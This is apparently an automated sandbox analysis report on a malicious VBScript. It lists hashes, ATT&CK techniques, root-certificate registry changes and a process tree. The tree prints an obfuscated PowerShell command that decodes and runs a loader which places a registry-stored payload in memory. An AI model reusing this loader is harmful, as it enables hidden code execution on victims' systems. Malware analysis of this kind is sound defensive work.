d7591cff1a0c0e915efc2968a12fe55cf701c9c9d32b0af77d4e27e9b5c41bd5

General

Target

d7591cff1a0c0e915efc2968a12fe55cf701c9c9d32b0af77d4e27e9b5c41bd5.vbs
Size

435KB
MD5

0de900a58b527ce0f6ab2324266a69ea
SHA1

d92ecfc817b4044b3b937db8e7a091f311d0a44b
SHA256

d7591cff1a0c0e915efc2968a12fe55cf701c9c9d32b0af77d4e27e9b5c41bd5
SHA512

ee961030f1612e1fb2e2ff11e7a09548cf0476e432c965fc55e36da0ccf9368a2db65fe587a3036fa9a0185e92d6614f075b8b1371f6d62484fcc3a5a65dd85a
SSDEEP

6144:RyF1b85ASf0UJa5mYfmVJOqsdzh7Y52eowLnb/D80Hh7MjxGPES5W5:RynG246dfmJOqsdztYoAZlM5

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	1788	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies system certificate store 2 TTPs 4 IoCs

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1756	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1756	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1788 wrote to memory of 1756	1788	WScript.exe	27
PID 1788 wrote to memory of 1756	1788	WScript.exe	27
PID 1788 wrote to memory of 1756	1788	WScript.exe	27
PID 1788 wrote to memory of 1756	1788	WScript.exe	27
PID 1756 wrote to memory of 2012	1756	powershell.exe	29
PID 1756 wrote to memory of 2012	1756	powershell.exe	29
PID 1756 wrote to memory of 2012	1756	powershell.exe	29
PID 1756 wrote to memory of 2012	1756	powershell.exe	29
PID 2012 wrote to memory of 1100	2012	csc.exe	30
PID 2012 wrote to memory of 1100	2012	csc.exe	30
PID 2012 wrote to memory of 1100	2012	csc.exe	30
PID 2012 wrote to memory of 1100	2012	csc.exe	30

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d7591cff1a0c0e915efc2968a12fe55cf701c9c9d32b0af77d4e27e9b5c41bd5.vbs"
1⤵
- Blocklisted process makes network request
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1788
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Nonconcession = """AntisAVaerrdPrelidbrams-ghostTJapanyPerodpMagikeClavi Optrn-RegisTEthnayRealipLokaleTajcoDArcubeboksefGnidnifelinnSyneriIronwtKnowiiKuldsoStttenReins prima'spastuCentosdrabaihavannBroodgDaffo BegrdSAlphayAbelmsbuggjtkantaeScyphmForst;AntrouVurdesUdspriForklnAsiatgObers AndenSCruroySermosprotetAmetheBrix mPomps.ForreRIndfduMonosnForsmtAfrimiKashomAalerePrinc.BibliIAppelnFortftOverreFalslrNaturoSaligpObrogSPauseeDiscorOverbvAnsatiudforcslibnetaksisNarko;ExsecpLtes uNacrebDelfilNereiiSejrscFunct epiphsShirttVedtaaNonsotSelvoicambrcBelgn KoncecBilamlOligoaAftrdsPebresLarru intraVSspejeBoligrNonagbBordeaJvnstlNereiiindigsviganaIsophtRiperiCoenaoTelaunRoublsBombe1Kingl{Epiga[RestaDHakkelMalprlRematIAnanamHuskepFrasaoAutosrKommetVampe(Anska`"""NotarkTrawleCarolrBelysnRoughejordblRelat3Sphen2Notac`"""Dashp)Banan]CaecapGymnouLinenbMabe lTrskoicurricSlagt curlesKlematAcrenaParaptTroeliRodeocGlasu clerieBrandxSigmotHjreseArkenrOringnKlage MobcaiOctobnTripltSamme PeritDRivegeUnclolRetsmeVoivotSigneeOverrABrunetMacrooNattymMinis(HeteriTermonPhilotChond GasseCOutquhThreaeCalis)Horse;Extra[NyhedDEnhyplStikplCicutIAktiemBrnespSbefaoImbatrApotetRaspb(anus `"""BerggkUdpakeForsurEssetnprevoeTalpalHjert3skdsk2Mekan`"""Drift)Fyrin]VivispFordeuQuantbLsladlDysmeiSuccecAthen CasersAmarytObsteaApprotChefkiAntihcKomma PunprePastexEthyltJordbepolysrUdskrnActua BagpavVenosoSammeiOdoridUdgla ToollSAntibeLanartGarneFCladoiGodaflUndiseNedkmAUnderpMaco iDatatsPalmiTReconoNatioAOsierNSaburSStudiIblind(grsen)Civil;Limoi[FireeDOpvaslRandmlKroplIBesa mIndbipRugekoFiltnrnonartCoeli(Progr`"""hordakTribueandy rPhasmnKapereIndbelRaspn3Lugge2Treat`"""Celle)Udgan]DalbypPontauUnsecbFondelCrackiKatedcAmeno ChudesBevistScaffaStatstPantoiRenovcHemoc FestmeParamxSkrigtBrugeeResidrBrnetnPlate AnsgniSpgelnVelbetPhenm MilielDeltecMankerTheileCandlahispatMisrg(GeneriCoimpnAfsketSedes cycadMUmeddeTrivesMilri,nonraiShottnNathatDig P ChrysHFairseUndesbBestorindemaLound)exalb;Plett[ShoddDCranilModvrlOutcrISluknmudvikpUbestoFlongrRivebtGidda(Ridde`"""pietekPlatyeindrerCentrnunconeJuvellLasts3Frper2Bevil`"""spids)Topdo]StellpbehemuRaadebOmgnglBarneiFejescGardi KbenhsTapettDaas aUnhewtHexamiQuadrcHorse BldereDeterxBarbetArctieWalisrVermunMedle NonaciGeomanBremstPreel UhvisVPhenoipotporbankotBalleuKluntatallolTenpoALsninlGraavlSiccaoconfecWhirl(KettliPostpnRevistFlock BlottvAmnio1Bagsm,TaphriUformnLakeytUnder JokqlvAksia2Harpi,traadiSauernGennetStemp UnvulvManua3Sedde,DdsdoiUndelnSlgtstAfluk DecorvSlyng4Heste)Plast;desul[ProtaDMiceplPinselStarlIBrneomStormpAngelocylinrOblontTyded(Oprrs`"""InteriUncrymForvamPoxy 3Cotyl2Diacr.OverbdRuggilSiggelDrikk`"""Ripel)Tanke]OctadpUdklkubassebPostmlAtariiLillacAfkla PrdiksConurtDegneaArchetUromeiAmusecStyes TrotteJollixMidletGtc ReapprerSelsknTaran SnkediSkurenMartitHoggi SekteIInattmnonemmEnriqCSvalerimmobeBystaaMilietUnproeConceCSalepoBrodenDobbytExceleBlodfxpatertRainm(Heath)Alfas;Doria[FelthDDekatlVaarblAviatIPolytmBiblipTopteoPeregrStatitSphec(Chada`"""ItinekbrumbeBygnirOratonFlyseeThundlSporo3Strkn2Bolet`"""Subch)Xerog]PellepRounduDdskrbCellslLaviniAktiocNonre outwosMunketAgoraaSiriatHyliciInsolcLers TripleModtaxSkaaltNonraePolyzrTilbanMinis AfskrIDemulnBidratStttePHallotSmkfyrMerri SnavvEBookinLovoruSensimaerobSDikteybelursAfmartStormeBewelmFormaLSibiloStrancMajoraNondilXylofeRentesNominWUnder(EndotuIroniiSpinanForswtbullo Deficvdronn1treet,ImminiUnequnremsktDepil IncruvOmgaa2Lnker)pronu;Stres[wilsoDIndeclSkuldlSpinkIMotivmSurfbpAmmeeoDisinrAngiotThund(Foder`"""MegalgSemipdKsemaiBodys3Arkiv2Bemoa`"""Bridd)Schli]TerpepUindfuFingebTombllSminkiStormcKrest PyrylsBrnemtindraaMagistdragsiJordfcDiske curvieExempxKemoftkonvoeRussirFarvenCount LinebiSilkenostentBumse BlomkUReplonCirrurUtmmeeRicaraStylolProgriDireczPeruseTruckOWelchbCowbajTilsjeIndukcVenantAntev(FumbliKollanUdsputCicat SheriVPlatyiOmgivrUrisk)Trevr;Dehyd}Crico'matri;Daady`$CursoVMandjeOxytorCtenobCountaMadenlCompaiGalvasLicheaAsientSjlehiValluoErgatnNecrosExtra3Angio=Appro[EksteVIndsteUndecrthalabFigaraSjaellDesuliEastlsVedstaCoaxytOpgaviFejemoSnorknReshastermi1Afrun]Quadr:recal:reconVKnolliHavanrbristtComituBibehaCoretldgnmiATrichlAgterlInjunoCalypcFurom(Knlet0Antar,Doits1Birds0Decim4Gilgi8Afloa5Skin 7socia6Semir,Frizz1basun2Defro2Plads8Venst8Short,Strni6Alema4Hugor)Jordr;Inter`$needlEFiercvCountoRakeslDriveuReligtFortaiUniceoBedmmnUntarePuerprUndissInval=Frust(UdskiGStruceBeroltcontr-RaketISaxiftPrinteForekmImburPUdtrkrEskimoSvberpEpicoeMedicrSkribtCacaeySklle Gerod-RkebiPPalpeaMennetFulmihAllok Agroo'FoldnHMirliKUnpatCRebstUNonab:Skole\inoxiSFondeoSagomfByrdetBrnerwgoralaMididrMadtoeSving\MinerPBlredaandallProfeastatiiRsterhKlarenBarytiCilichPermeaBrneunLight'Hjres)Afstr.ShiftLPsychaDeklisFlerttAvanceQueeneHusbavLunulnfemmaeesoca;Unapp`$sikkepGaaenoAntiesResoltGaleaaoversrBeskymHalvtiChearsSpisetKonveiAlbercKisseeSikke Perso=Unpro Voile[JohanSSkjalyWritasTelevtEnjameUnsuimConta.ModstCaggraoPolitnSnekkvSkrbueSmlesrril btAcrop]Kvidr:Subcl:DefinFRetearbefudoForjamSavioBlandbaUdraasHaandeManip6Color4RucheSMilletFinicrSkrueiElittnCampigToast(Pigst`$melleEContrvArdeiotermolAnnamuForjatGobliiExtraoFrugtnKanapeRamarrSaltlsfremt)Nonet;Brnei[RallySVandryOxindsImpretMonopeStilemPloww.AmaryRLejliuLabornVilletCruisiLonenmPaaskeBrs T.UnfulIFrancnDesictTeleoeAftrdrAcaleoWurlipPsiloSSpndeeEscalrSolfivStriciEmerscBeskaeProvosObtur.nonprMPatuxaCepharFetalsTriklhKrysaaVisualForud]Ideta:Burt :RustiCDimidoKunstpBlysmyStrat(Ndlan`$SekunpAllowoForudsRaadgtThae aGrundrCaulomBlaasiRhizosMicrotBronkiHattrcUnambeNonge,Linne Exclu0Steno,Tetra Demis Runte`$AnduiVBlurbeKommurOxytebPancraRetailEtpariGgekasAbaddaVanddtRistiiDesegoClothnUndetsdeton3Forgr,Aston Golde`$UsdelpFjeldoStatisbuntitPrereaSernerSlipomFrankiClamjsFraictPhysiiConvacAttaieJargo.IsopscKavi oStudeuElevtnOpinitantim)Hormo;Hospi[DecolVSubaceAfsvkrYouthbBarmeaHistolOrdoviPrelosUbesrahypottPandeiInteroCook nFedeksnondi1Forln]Luftf:Tange:BibliEMilienKataluMyriomRwandSremboyskrmbsFljtetBruttetruttmRorpiLVildsoabthacAmys aAntrklSprogeFasansNonimWMonop(Gesan`$CopasVBilleeMultarKredebLinieaMasthlFiskeiNotitsUdfrsaAnlbstBalaniTerrooBldtvnPaleosSubse3Stama,Grund Bened0farre)margi#Biest;""";Function Verbalisations4 { param([String]$Inconquerable2); For($i=5; $i -lt $Inconquerable2.Length-1; $i+=(5+1)){ $Motorbicycle110 = $Motorbicycle110 + $Inconquerable2.Substring($i, 1); } $Motorbicycle110;}$Inconquerable0 = Verbalisations4 'ArkaiIStoveEDistiXAbsci ';$Inconquerable1= Verbalisations4 $Nonconcession;& ($Inconquerable0) $Inconquerable1;;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1756
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gcid9qlu.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2012
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF75B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF74B.tmp"
      4⤵
      PID:1100

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

Modify Registry

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESF75B.tmp

Filesize
1KB

MD5
f43afb4a2b1f3fc753a8fa3865e3b4ec

SHA1
8e230ccd0d665b2a4b9d5b2bd293ea489abb0a20

SHA256
5e3d9f79aa9c398a0d0fc4c4ad03d1499974d5b7307e4c5a170d08aaf55bd716

SHA512
ab0e4f80e52cbf300f9887240b2d68f6cb1ee122e7d5485a3afeb83bcdae4297a1d04a516b7d401597154fba447336fa82457ca4b58cb84a41cc18d9359b71fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\gcid9qlu.dll

Filesize
3KB

MD5
b57cd30df8d3e1f3d48d4a3f187472b4

SHA1
8f2c1ae8874f1b2f37186fe9974aea35f872fa80

SHA256
ce6fb7ccb9f08c4683a041baa44dfdd762f5061c4655d0f07a7fb377d3dde9b6

SHA512
7b82dcff85e5e171e6c96283c30ee93373d2de4f60461d08796c291e35b61e6b54c79aa094da25df31b19d609bdcf16bfb1cb06519348bd2451abb9cbbd096f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\gcid9qlu.pdb

Filesize
7KB

MD5
83bb5496b4deb14e49633a4dae11228c

SHA1
79c4773ea3826ed4c5edf14c04621524a3b5eebf

SHA256
6b1a4ee563d4809f71e3817ce612b9684e468d31653409610a2f799cfe2b2044

SHA512
dbcea2a67fad4e13ec5375cae743b8ecfb2b433df232e12703f3519db48d6125a61614891d897cb888909a5df551a05fddc726d35217e3c5b3cf93626e4f2fd2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCF74B.tmp

Filesize
652B

MD5
c6b17071aa848c3bf3af46f2b432213c

SHA1
551b3233bbe415081cc05bcb9b9a1b5032b922e8

SHA256
bfc2f859592ebcbb9c54d3fb81e097511fb84229e56d246105c56559edc62283

SHA512
7c62c376c3d4bd4fa2e0aabd2b6e5d2fae45cfd4c7728cf560c2364e10b0f78516960c396a07cae95b34b67a32da069051506d955fd4966f7418bfb465b8d67f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gcid9qlu.0.cs

Filesize
615B

MD5
ddcacaa4ce34648d2f2b9c9b19b0a656

SHA1
d279d394e8020760bd4887d6c03c0a1aa0093cd1

SHA256
93fa5982484bcc87507cc62debe71fbcc44fd4a2b34686ea1cdfe62ca1c416f0

SHA512
c48ef533ac92488358b55a001fbcbd9c93e249ecff24670176d21a367ad2f8c85203d672e6aeca8a13e69b1c6926e154bbb2afc05bc5d766d461b1e1d17cdb15

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gcid9qlu.cmdline

Filesize
309B

MD5
d195551681f7d165461c99f3226116a4

SHA1
011ad0aeb2fe3fc8aa7463db7c590bdad6a6123a

SHA256
7ee2ffce0bb190c06294a6f116d0b81ae28c84bd130abe5ae24fd65162c240fb

SHA512
868e44a24ec313392c4c8e21a11a12525b5ca8cf11839774c7d25aebed91715d4b61123326a42f21e8b0d2df31fe73c0050f12910a683563ef55b27c279dd2d4

Download Submit
memory/1756-57-0x0000000074130000-0x00000000746DB000-memory.dmp

Filesize
5.7MB

Download
memory/1756-56-0x00000000761F1000-0x00000000761F3000-memory.dmp

Filesize
8KB

Download
memory/1756-66-0x0000000004F90000-0x0000000005090000-memory.dmp

Filesize
1024KB

Download
memory/1756-67-0x0000000074130000-0x00000000746DB000-memory.dmp

Filesize
5.7MB

Download
memory/1756-68-0x0000000004F90000-0x0000000005090000-memory.dmp

Filesize
1024KB

Download
memory/1788-54-0x000007FEFBF41000-0x000007FEFBF43000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing